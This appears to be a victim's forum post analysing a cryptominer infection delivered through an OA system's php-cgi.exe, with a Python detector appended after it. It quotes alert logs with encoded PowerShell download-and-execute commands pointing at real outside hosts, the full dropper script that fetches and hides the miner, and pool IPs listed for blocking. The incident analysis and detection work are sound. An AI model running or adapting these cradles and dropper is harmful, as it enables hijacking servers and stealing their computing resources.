Cryptomining malware running through the OA's php-cgi.exe is exhausting server resources
The server got infected. We cleaned it once, then it switched to other malicious sources, and the antivirus can't detect it. The server is 2012R2 and the OA is the latest 2017 release, 10.20. Checking the logs showed:
It calls the OA's php-cgi.exe to download and run the script https://www.naosbio.com/images/main/js/ax.txt, which installs the MSASC.exe program,
and that program then contacts the mining control server, exhausting the server's CPU and memory.
Step 1: install MSASC and run it
Abnormal process behaviour - access to malicious download source 2020-06-06 05:54:11
Parent process path: D:/MYOA/bin/php-cgi.exe
Parent process command line: D:\MYOA\bin\php-cgi.exe
Parent process ID: 3704
Process ID: 14824
URL: https://www.naosbio.com/images/main/js/ax.txt
Process path: C:/Windows/SysWOW64/cmd.exe
Command line: cmd /c powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbgBhAG8AcwBiAGkAbwAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBtAGEAaQBuAC8AagBzAC8AYQB4AC4AdAB4AHQAJwApAA==
Abnormal process behaviour - abnormal call to system tool 2020-06-06 05:54:12
Command line: powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbgBhAG8AcwBiAGkAbwAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBtAGEAaQBuAC8AagBzAC8AYQB4AC4AdAB4AHQAJwApAA==
Process path: C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe
Process ID: 15048
Parent process command line: cmd /c powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbgBhAG8AcwBiAGkAbwAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBtAGEAaQBuAC8AagBzAC8AYQB4AC4AdAB4AHQAJwApAA==
Parent process file path: C:/Windows/SysWOW64/cmd.exe
The script at https://www.naosbio.com/images/main/js/ax.txt runs and downloads the MSASC program:
$ne = $MyInvocation.MyCommand.Path
$miner_url = "https://www.naosbio.com/images/main/js/a/MSASC.exe"
$miner_url_backup = "https://www.naosbio.com/images/main/js/a/MSASC.exe"
$miner_name = "MSASC"
$miner_cfg_url = "https://www.naosbio.com/images/main/js/a/config.json"
$miner_cfg_url_backup = "https://www.naosbio.com/images/main/js/a/config.json"
$miner_cfg_name = "config.json"
$killmodule_url = "https://www.naosbio.com/images/main/js/a/clean.bat"
$killmodule_url_backup = "https://www.naosbio.com/images/main/js/a/clean.bat"
$killmodule_name = "clean.bat"
# Everything is dropped into the user's TEMP directory (C:\Windows\TEMP for the web worker's account)
$miner_path = "$env:TMP\MSASC.exe"
$miner_cfg_path = "$env:TMP\config.json"
$payload_path = "$env:TMP\update.ps1"
$killmodule_path = "$env:TMP\clean.bat"
# Stop any running copy, delete the old file, then re-download it (falling back to the backup URL on failure)
function Update($url,$backup_url,$path,$proc_name)
{
    Get-Process -Name $proc_name | Stop-Process
    Remove-Item $path
    Try {
        $vc = New-Object System.Net.WebClient
        $vc.DownloadFile($url,$path)
    }
    Catch {
        Write-Output "donwload with backurl"
        $vc = New-Object System.Net.WebClient
        $vc.DownloadFile($backup_url,$path)
    }
}
# clean.bat is re-downloaded every run, whether or not a copy already exists
if((Test-Path $killmodule_path))
{
    Remove-Item $killmodule_path
    Update $killmodule_url $killmodule_url_backup $killmodule_path $killmodule_name
}
else {
    Update $killmodule_url $killmodule_url_backup $killmodule_path $killmodule_name
}
# The miner and its config.json are only fetched and started when no MSASC process is already running
if(!(Get-Process $miner_name -ErrorAction SilentlyContinue))
{
    Update $miner_url $miner_url_backup $miner_path $miner_name
    Update $miner_cfg_url $miner_cfg_url_backup $miner_cfg_path $miner_cfg_name
    Start-Process $miner_path -windowstyle hidden
}
else
{
    Write-Output "Miner Running"
}
# Finally clean.bat is run in a hidden window
Start-Process cmd.exe "/c $killmodule_path" -windowstyle hidden
Abnormal process behaviour - suspicious file dropped and executed 2020-06-06 05:54:15
Command line: "C:\Windows\TEMP\MSASC.exe"
Process path: C:/Windows/Temp/MSASC.exe
Process ID: 3440
Parent process command line: powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbgBhAG8AcwBiAGkAbwAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBtAGEAaQBuAC8AagBzAC8AYQB4AC4AdAB4AHQAJwApAA==
Step 2: MSASC runs and contacts the mining control server
Malicious process (cloud scan) - mining program 2020-06-06 05:54:19
File path: C:/Windows/Temp/MSASC.exe
Malicious file md5: b5fa5e04c916ca653a01e209754bc2fa
Process ID: 3440
Description: after breaking in, attackers commonly plant a mining program to earn profit,
Abnormal network connection - mining-pool communication 2020-06-06 05:59:07
Mining pool IP: 94.23.23.52
Mining pool port: 3333
Process path: C:/Windows/Temp/MSASC.exe
Process ID: 3440
Command line: "C:\Windows\TEMP\MSASC.exe"
Malicious process (cloud scan) 2020-06-06 06:49:03
Control server IP: 37.187.95.110
Control server port: 3333
Process path: c:/windows/temp/msasc.exe
Command line: "C:\Windows\TEMP\MSASC.exe"
Event description: 云盾 (Cloud Shield) detected that a process on your server is attempting to contact a suspicious malicious IP
Mining control-server IPs: these can be added to the firewall to deny connections to the following IPs:
210.108.70.119,
94.23.247.226,
37.59.55.60,
37.59.43.131,
149.202.83.171,
91.121.140.167,
94.23.23.52,
37.187.95.110,
185.92.222.223,
94.130.165.85,
1.246.220.121
-------------------------
Earlier we were also hit by a mining infection, also through calls to the OA's php-cgi.exe; it generated some other files under the OA folder, which we deleted outright at the time without keeping them.
Abnormal process behaviour - access to malicious download source
Parent process path: D:/MYOA/bin/php-cgi.exe
Parent process command line: D:\MYOA\bin\php-cgi.exe
Parent process ID: 3244
Process ID: 28184
URL: http://13.115.195.195:801/muma.ps1
Process path: C:/Windows/SysWOW64/cmd.exe
Command line: cmd /c powershell -enc IEX (New-Object System.Net.Webclient).DownloadString('http://13.115.195.195:801/muma.ps1')
Vulnerability associated with this URL: None
Event description: 云盾 (Cloud Shield) detected that your server is attempting to access a suspicious malicious download source

Suggest installing 火绒 (Huorong) and running a scan.
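As an added example (not part of the original post, and not code from any OA or antivirus vendor), the Python script below applies the checks this report implies to constructed alert records modelled on the entries above: it decodes the `powershell -enc` payload (which is base64 of UTF-16LE text), flags a web worker such as php-cgi.exe spawning cmd.exe or powershell.exe, pulls download URLs out of the command line, and matches outbound connections against the pool/control-server IP list quoted in the post. The base64 string, file paths, port and IPs are the ones quoted above; the sample events, rule names and function names are my own assumptions. It also covers the second incident's edge case, where `-enc` was followed by a plain `IEX` string rather than base64, so the decoder must fail gracefully and the URL is taken from the raw command line instead.

```python
import base64
import re
from dataclasses import dataclass

# Pool / control-server IPs listed in the post (taken from the page, not invented)
KNOWN_POOL_IPS = {
    "210.108.70.119", "94.23.247.226", "37.59.55.60", "37.59.43.131",
    "149.202.83.171", "91.121.140.167", "94.23.23.52", "37.187.95.110",
    "185.92.222.223", "94.130.165.85", "1.246.220.121",
}
STRATUM_PORTS = {3333}              # port used by both pool alerts in the post
WEB_WORKERS = {"php-cgi.exe"}       # a web worker has no business launching a shell
SHELLS = {"cmd.exe", "powershell.exe"}

# The encoded payload quoted verbatim in the first alert (from the page)
SAMPLE_ENCODED = (
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4A"
    "VwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcA"
    "aAB0AHQAcABzADoALwAvAHcAdwB3AC4AbgBhAG8AcwBiAGkAbwAuAGMAbwBtAC8AaQBtAGEA"
    "ZwBlAHMALwBtAGEAaQBuAC8AagBzAC8AYQB4AC4AdAB4AHQAJwApAA=="
)


@dataclass
class Finding:
    rule: str
    detail: str


def basename(path):
    """Last path component, case-folded; the alerts mix '/' and '\\' separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Plaintext of a 'powershell -enc <b64>' argument, or None.

    -EncodedCommand carries base64 of UTF-16LE text. A non-base64 argument
    (as in the second incident on the page) must return None, not raise."""
    m = re.search(r"-(?:enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_urls(text):
    """Download-cradle URLs; stop at the quotes and parentheses wrapped around them."""
    return re.findall(r"https?://[^\s'\"()]+", text)


def check_process_event(parent_path, child_path, child_cmdline):
    """Evaluate one 'process created' alert and return the findings it triggers."""
    findings = []
    parent, child = basename(parent_path), basename(child_path)
    if parent in WEB_WORKERS and child in SHELLS:
        findings.append(Finding("web-worker-spawns-shell", f"{parent} -> {child}"))
    plain = decode_encoded_command(child_cmdline)
    if plain is not None:
        findings.append(Finding("encoded-powershell", plain))
    # Look for URLs in the decoded text when there is one, else in the raw command line
    for url in extract_urls(plain if plain is not None else child_cmdline):
        findings.append(Finding("download-cradle-url", url))
    return findings


def check_network_event(remote_ip, remote_port):
    """Evaluate one outbound-connection alert against the pool IOC list."""
    findings = []
    if remote_ip in KNOWN_POOL_IPS:
        findings.append(Finding("known-pool-ip", remote_ip))
    if remote_port in STRATUM_PORTS:
        findings.append(Finding("stratum-port", str(remote_port)))
    return findings


# Constructed sample events, modelled on the alerts quoted in the post
SAMPLE_EVENTS = [
    ("process", "D:/MYOA/bin/php-cgi.exe", "C:/Windows/SysWOW64/cmd.exe",
     "cmd /c powershell -enc " + SAMPLE_ENCODED),
    ("process", "D:/MYOA/bin/php-cgi.exe", "C:/Windows/SysWOW64/cmd.exe",
     "cmd /c powershell -enc IEX (New-Object System.Net.Webclient)"
     ".DownloadString('http://13.115.195.195:801/muma.ps1')"),
    ("process", "C:/Windows/explorer.exe", "C:/Windows/System32/notepad.exe",
     "notepad.exe"),                  # benign control case, should not fire
    ("network", "94.23.23.52", 3333),
    ("network", "8.8.8.8", 53),       # benign control case, should not fire
]


def triage(events):
    """Return {event index: [rule names]} for every event that fired at least one rule."""
    hits = {}
    for i, ev in enumerate(events):
        found = check_process_event(*ev[1:]) if ev[0] == "process" else check_network_event(*ev[1:])
        if found:
            hits[i] = [f.rule for f in found]
    return hits


if __name__ == "__main__":
    for i, rules in triage(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i][0], rules)
```

Run stand-alone it prints the rule names fired by events 0, 1 and 3 and stays silent on the two benign control events. The parent-child rule is the one worth wiring into whatever log pipeline sits behind these alerts: php-cgi.exe spawning cmd.exe is the first observable step in both incidents, before any download or mining traffic exists.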